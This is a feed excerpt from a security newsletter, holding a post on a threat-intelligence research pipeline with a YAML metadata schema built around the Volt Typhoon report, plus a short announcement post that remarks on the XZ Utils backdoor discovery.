srcset="https://substackcdn.com/image/fetch/$s_!GQeI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 424w, https://substackcdn.com/image/fetch/$s_!GQeI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 848w, https://substackcdn.com/image/fetch/$s_!GQeI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 1272w, https://substackcdn.com/image/fetch/$s_!GQeI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GQeI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png" width="1267" height="374" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:374,&quot;width&quot;:1267,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&#128302;R1D3 Threat Driven Research Pipeline - Part 1&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" title="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" srcset="https://substackcdn.com/image/fetch/$s_!GQeI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 424w, https://substackcdn.com/image/fetch/$s_!GQeI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 848w, https://substackcdn.com/image/fetch/$s_!GQeI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 1272w, https://substackcdn.com/image/fetch/$s_!GQeI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddbe8db4-73d1-473c-b6b9-44a44c9a20a5_1267x374.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In our Research Phase, the most important question we want to answer is one about <em>information meaning or significance</em>: <strong>what does this cluster of data </strong><em><strong>mean</strong></em><strong> within the context of my organization and how does it inform actionable outcomes?</strong> What I describe abstractly as <em>"a cluster of data"</em>, refers to any information that arrives to us in a structured or unstructured manner, though the majority of times it is unstructured: a threat report, a summary of intel provided by a trusted party, information about an attack suffered by a company in the same industry vertical, etc. The reason it is unstructured is that the majority of threat intel globally is produced for the consumption of human brains and not machines. We have already covered this topic in detail <a href="https://quasarops.com/p/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">Part 1 of The Problem of Why: Threat-Informed Defence</a> and <a href="https://quasarops.com/p/the-uncertainty-of-intelligence-and-the-entropy-of-threats/">Part 2 of The Problem of Why: The Uncertainty of Intelligence and the Entropy of Threats</a>.</p><p>There are different semantic layers to data and information. These layers are not necessarily interoperable: <em>what has significance for a machine learning algorithm is not computable by a human brain</em>. This is why information about threats still exists in unstructured shape as text that can be interpreted by our human eyes and brains. It has to exist in this way too, because we make decisions in a very different way to the way machines do.</p><p>However threat information in its "human-readable" shape suffers many limitations, our implicit schemas don't scale well and perform poorly in big data contexts.</p><p>We go back to our initial question: <em>what does this "x" or "y" data cluster mean for you? what is the significance of it?</em> Information needs to be able to direct and influence the behaviour of the business to improve security controls that ultimately protect the revenue streams which are the very core of its existence.</p><h2>The problem is not cyber threats</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TBmN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TBmN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 424w, https://substackcdn.com/image/fetch/$s_!TBmN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 848w, https://substackcdn.com/image/fetch/$s_!TBmN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 1272w, https://substackcdn.com/image/fetch/$s_!TBmN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TBmN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png" width="710" height="757" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:757,&quot;width&quot;:710,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&#128302;R1D3 Threat Driven Research Pipeline - Part 1&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" title="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" srcset="https://substackcdn.com/image/fetch/$s_!TBmN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 424w, https://substackcdn.com/image/fetch/$s_!TBmN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 848w, https://substackcdn.com/image/fetch/$s_!TBmN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 1272w, https://substackcdn.com/image/fetch/$s_!TBmN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F152be7c2-95fc-47b4-aae1-49169c1445db_710x757.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>You may be tempted to assume that the problem of threat-informed defence is about cyber threats. But what is a "cyber threat"? Common lore tells us a cyber threat is the crossover of <strong>intent + capability + opportunity</strong>. Let's for a moment accept the current industry heuristic and consider a cyber threat as a construct that has the three variables stated above. This concept means nothing if we cannot link it to data. The problem of threat-driven cyber defence is not about threats, it is about our knowledge of this construct we call a "cyber threat": what are the discrete datapoints in which it is represented in our internal systems? <a href="https://oasis-open.github.io/cti-documentation/stix/intro.html?ref=quasarops.com">STIX</a> is an example of a framework that aims to answer that question but solely from the modelling perspective. The problem of cyber threats is about <strong>data semantics and our model's descriptive power</strong>: our ability to map feature-rich data from the complex domain of world events to the domain of cyber defence operations.</p><p>This data semantics problem can be summarized in the five dimensions of <strong>information significance</strong>. There is a great paper that is the result of a thorough literature review about the topic: <a href="https://dl.acm.org/doi/10.1145/3484202?ref=quasarops.com">Threat Intelligence Quality Dimensions for Research and Practice</a>. The authors examine the dimensions of <em>data provenance, relevance, interoperability, reliability, actionability and timeliness</em>. Information significance is, in other words, the process of meaning extraction from feature-rich data of <a href="https://towardsdatascience.com/the-curse-of-dimensionality-50dc6e49aa1e?ref=quasarops.com">high dimensionality</a>. How to design a data pipeline that is efficient at extracting meaning from your threat intelligence data?</p><h1>Enter the Active Defence Research Data Pipeline &#128373;&#65039;&#8205;&#9792;&#65039;</h1><p>I truly need diagrams to better express the mental models I'm thinking about so here's the diagram that represents what we are going to talk about today:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Ibnf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Ibnf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 424w, https://substackcdn.com/image/fetch/$s_!Ibnf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 848w, https://substackcdn.com/image/fetch/$s_!Ibnf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 1272w, https://substackcdn.com/image/fetch/$s_!Ibnf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Ibnf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png" width="2000" height="1488" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1488,&quot;width&quot;:2000,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&#128302;R1D3 Threat Driven Research Pipeline - Part 1&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" title="&#128302;R1D3 Threat Driven Research Pipeline - Part 1" srcset="https://substackcdn.com/image/fetch/$s_!Ibnf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 424w, https://substackcdn.com/image/fetch/$s_!Ibnf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 848w, https://substackcdn.com/image/fetch/$s_!Ibnf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 1272w, https://substackcdn.com/image/fetch/$s_!Ibnf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd464f1f9-bd17-454d-a503-1bab0d0b7f6f_2000x1488.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><br>A brief note about our design principles:</p><ul><li><p>The whole pipeline workflow is built to resemble the concept of a <a href="https://medium.com/enterprise-rag/harry-potter-and-the-self-learning-knowledge-graph-rag-426f5e56ca9b?ref=quasarops.com">self-learning knowledge graph</a>.</p></li><li><p>My journeys into machine learning on the one side, and investigation methodologies on the other, have made me realise that both worlds share many commonalities.</p></li><li><p>The research phase of R1D3 relies heavily on the concept of modelling our information into practical and usable schemas. I'm not talking here about threat modelling frameworks like STRIDE, PASTA, DREAD, etc. I'm referring to data schemas that help extract meaningful intrinsic relationships and workflows that help map the fields and properties in our schema to relevant security operations activities like threat hunting, detection engineering, adversary emulation, etc.</p></li><li><p>Automation and DevOps readiness are other guiding principles for this model. Please consider that many steps in the pipeline are automatable to a degree. However, <em>not everything is nor should be</em> automated.</p></li><li><p>Organic-brain computing by us humans is still very much required for the difficult work of integrating the depth of contextual layers of your business' ever-evolving environment: <em>"It is important to note that all intelligence analysis is generated by a human"</em> (<a href="https://play.google.com/store/books/details?id=kvkxDwAAQBAJ&amp;ref=quasarops.com">Intelligence-Driven Incident Response</a>, p42)</p></li></ul><h2>Diving into the Components of R1D3 Research Pipeline &#127754;</h2><p>We will approach this following an example, and building a schema as we go along. We will utilize <a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/?ref=quasarops.com">Microsoft's report on Volt Typhoon</a> as an example.</p><h2>Collect &#128269;</h2><h3>Step 01: Reconnaissance &#129517;</h3><p>The Cyber Kill Chain model has indoctrinated us into believing that reconnaissance is an activity that <em>merely relates to offensive security</em>. However, at its core, it is really all about building a more comprehensive situational awareness. The recon phase loosely aligns with the stage of "planning and direction" in the classic threat intelligence lifecycle. You will ideally leverage internal or external threat intelligence teams to provide the information that you need. There should be an initial set of questions here that will act as rough direction requirements.</p><h3>Step 02: Gather &#129522;</h3><p>Our gathering stage is what loosely aligns with the "collection" phase of the classic threat intelligence lifecycle. Our objective is to obtain telemetry, observables or more refined products like threat reports. Gathered data has to be stored somewhere for later processing and review</p><h3>Step 03: Classify &#127991;&#65039;</h3><p>As information arrives in our research pipeline, we need to apply some initial labelling of it based on coarse primitive categories that can be adjusted later on. This activity will constitute our first metadata layer. Our primitive categories create initial boundaries that help segregate distinct data and group similar data. It is our initial attempt at classification. There are three important actions happening here:</p><ol><li><p>define some coarse initial labels for your data like whether the information was obtained from external or internal sources, whether it is in a structured or unstructured format, whether it was self-sourced by the team or some other team provided it, what date was received on, etc. These initial tags need to be meaningful in the context of your operating environment</p></li><li><p>after initial coarse classification apply some boundary logic that decides what is part of the same or different information, i.e. if you received multiple threat reports at different points of a week about the same topic, should they be considered part of the same body of work for downstream processing purposes? At a quick glance, what are the chunks of information that contain the most valuable aspects for consideration, i.e. where should we focus our attention in the next step?</p></li><li><p>if we have received multiple reports from different sources that are exactly the same, attempt to deduplicate or discard duplicates</p></li></ol><p>Applied to our Volt Typhoon example, using some sample data from the report, we could imagine our schema so far looking like this:</p><pre><code># Metadata for Initial Threat Intel Classification

source:
  type:  # Internal, External
  example:  # Threat intelligence vendor report, OSINT research

structure:
  type:  # Structured, Semi-structured, Unstructured
  example:  # Structured threat feed, CSV file,  Natural language text

origin:
  type:  # Self-Sourced, Third-Party
  example:  # Produced by your own team,  Received  from partner

timestamp:
  type: Date/Time  # Use a consistent format (ISO 8601 preferred)
  example: 2024-04-19 10:35:00-07:00 

focus_areas: 
  type:  # List of free-form text tags
  example: 
    - stealth
    - living-off-the-land
    - credential theft
    - network devices

report_hash: 
  type:  # A standard hash algorithm (MD5, SHA1, etc.) used to hash sections of the report which can later be used to deduplicate or find similarities among diverse reports
  example: 8d7dd54b6b28d95f2504b46c015b5846 

</code></pre><h2>Next Steps</h2><p>In the next article, we will continue exploring the "R" of R1D3 framework and will expand on the Analysis phase, touching on Entity and Relationship Extraction, Entity Linking, Investigation and the tip of the iceberg around Model prototyping. The key point we will address will be this weird motto I came up with: <strong>Develop your Knowledge Graph from your Knowledge Gaps</strong></p><p>Originally, everything was squashed into a single article but it ended up being like 6000 words long and you wouldn't stay with me that long even if I paid you!</p><p>Have a great week and please drop your comments in the section at the bottom of the page, and let me know if you would like more or less like this &#128515;</p>]]></content:encoded></item><item><title><![CDATA[Things are changing]]></title><description><![CDATA[From OpenSSH backdoors to Antifragile Systems]]></description><link>https://www.quasarops.com/p/things-are-changing</link><guid isPermaLink="false">https://www.quasarops.com/p/things-are-changing</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Sun, 14 Apr 2024 08:37:59 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/d4411a50-01e3-4c58-bd86-7941f14d92ce_1024x1024.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!QrZm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!QrZm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 424w, https://substackcdn.com/image/fetch/$s_!QrZm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 848w, https://substackcdn.com/image/fetch/$s_!QrZm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 1272w, https://substackcdn.com/image/fetch/$s_!QrZm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!QrZm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Things are changing&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Things are changing" title="Things are changing" srcset="https://substackcdn.com/image/fetch/$s_!QrZm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 424w, https://substackcdn.com/image/fetch/$s_!QrZm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 848w, https://substackcdn.com/image/fetch/$s_!QrZm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 1272w, https://substackcdn.com/image/fetch/$s_!QrZm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7925515f-2664-44ec-acef-b5b7a50e9ec7_1024x1024.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>Hello my fellow cyberscouts, I have plenty of news to share with you and I need your help today!</p><p><strong>Warning</strong>: <em>there are some words in this email&#8230; yeah, that&#8217;s the warning.</em></p><ul><li><p>I am changing domains soon, going back to an oldie of mine: <strong>quasarops.com</strong>. So if you receive the next Tales of a Cyberscout newsletter from quasarops.com, <em>rest assured that it is none other than your humble servant here doing it with full intention</em>.</p></li><li><p>Why do I write? As Henrik Karlsson would put it, writing for me <a href="https://www.henrikkarlsson.xyz/p/search-query?ref=quasarops.com">is a very long and complex search query to find fascinating people</a> and create new connections that didn't exist before. That's what this is about.</p></li><li><p>On the above, I suck at promoting my research and selling myself out there, I don't follow SEO best guidelines, I don't "post" regularly, I don't do Instagram, Tik-Tok, etc. If I don't have something meaningful to say, why say anything at all? Above all, I value my time for deep connection with the people that give meaning to my life. My writing is a way to share meaning with you on the other side.</p></li><li><p>Do you want to write with me in the Tales of a Cyberscout? Get in touch! I get bored of just reading my own words. We need a multiplicity of voices to increase discoverability of great ideas.</p></li></ul><h2>A lovely couple of weeks?</h2><p>It's been around two weeks since a curious PostgreSQL developer from Microsoft saved OpenSSH around the planet from being backdoored by APT-level malware. Thousands of incident responders are probably thanking him.</p><p>How on earth were we saved from this one? You need to thank two things: curiosity and <a href="https://readwise-assets.s3.amazonaws.com/media/wisereads/articles/understanding-is-a-poor-substi/ConvexityScience.pdf?ref=quasarops.com">antifragile systems</a>. We tend to underestimate the value of curiosity, and we tend to overestimate the value of calculative rationality with predictable risk management results. What happens when you cannot reliably mitigate social engineering threats? You cannot tell C-Suite execs out there to "embrace randomness". Well, what do you think you are doing when you talk about "unknown unknowns"? You <a href="https://readwise-assets.s3.amazonaws.com/media/wisereads/articles/understanding-is-a-poor-substi/ConvexityScience.pdf?ref=quasarops.com">cannot systematize, formalize, and program randomness</a>. By its own definition an "unknown unknown" is something you absolutely without a shadow of a doubt <em>cannot predict and risk manage</em>. Perhaps we need to revisit this commonplace vocabulary we use to describe things in the cyber world. I've <a href="https://quasarops.com/p/threat-hunting-breaking-habit-02/">written about this extensively in the past</a>.</p><p>There remains a thread that leads to an interesting pattern though: to fight back in our current perilous times is to remain deeply curious about the transient states of the world, just like Andreas was, doing benchmarking work and getting curious about the slightly higher-than-normal CPU usage of <code>sshd</code>. Yeah, that is it guys.</p><p>I have words a plenty to share about the XZ Utils backdoor but there are some more pressing matters. This email is to let you know that I haven't forgotten about you on the other side of this envelope for thoughts mounted on top of an SMTP protocol bike.</p><p>Next week I plan to release the first part of the Research concepts of <strong>R1D3 framework</strong>, something I've briefly mentioned <a href="https://quasarops.com/p/threat-hunt-vs-detection-engineering-the-saga-continues/">in my last long post</a>.</p><p>Until then, stay tuned and have a great week!</p>]]></content:encoded></item><item><title><![CDATA[Threat Hunting vs Detection Engineering? The saga continues ⛵]]></title><description><![CDATA[In this article, we argue that the "Threat Hunting vs Detection Engineering" debate is outdated and doesn't help us improve cybersecurity. We believe 